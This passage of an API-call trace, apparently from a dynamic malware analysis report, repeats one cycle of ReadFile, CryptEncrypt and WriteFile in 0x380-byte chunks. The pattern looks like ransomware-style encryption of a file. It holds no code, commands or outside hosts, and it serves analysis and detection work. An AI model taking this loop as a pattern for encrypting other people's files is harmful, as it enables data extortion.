lpOverlapped=0x0) returned 1 [0141.957] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.957] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.957] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.957] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.957] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.957] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.957] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.957] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.957] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.957] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.957] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.957] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.957] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.957] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.957] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.957] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.958] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.958] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.958] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.958] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.958] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.958] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.958] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.958] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.958] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.958] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.958] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.958] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.958] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.958] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.958] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.958] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.958] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.959] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.959] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.959] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.959] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.959] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.959] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.959] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.959] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.959] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.959] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.959] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.959] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.959] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.959] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.959] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.960] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.960] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.960] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.960] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.960] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.960] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.960] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.960] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.960] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.960] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.960] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.960] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.960] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.960] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.960] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.961] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.961] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.961] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.961] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.961] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.961] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.961] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.961] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.961] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.961] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.961] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.961] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.961] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.962] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.962] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.962] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.962] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.962] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.962] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.962] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.962] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.962] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.962] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.962] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.962] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.962] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.962] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.962] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.962] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.962] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.962] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.962] CryptEncrypt (in: hKey=0x27fee18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x5c6fd0*, pdwDataLen=0x2c5dcd8*=0x380) returned 1 [0141.962] WriteFile (in: hFile=0x5d74, lpBuffer=0x5c6fd0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesWritten=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.963] ReadFile (in: hFile=0x5d5c, lpBuffer=0x5c6fd0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5dcd8, lpOverlapped=0x0 | out: lpBuffer=0x5c6fd0*, lpNumberOfBytesRead=0x2c5dcd8*=0x380, lpOverlapped=0x0) returned 1 [0141.963] 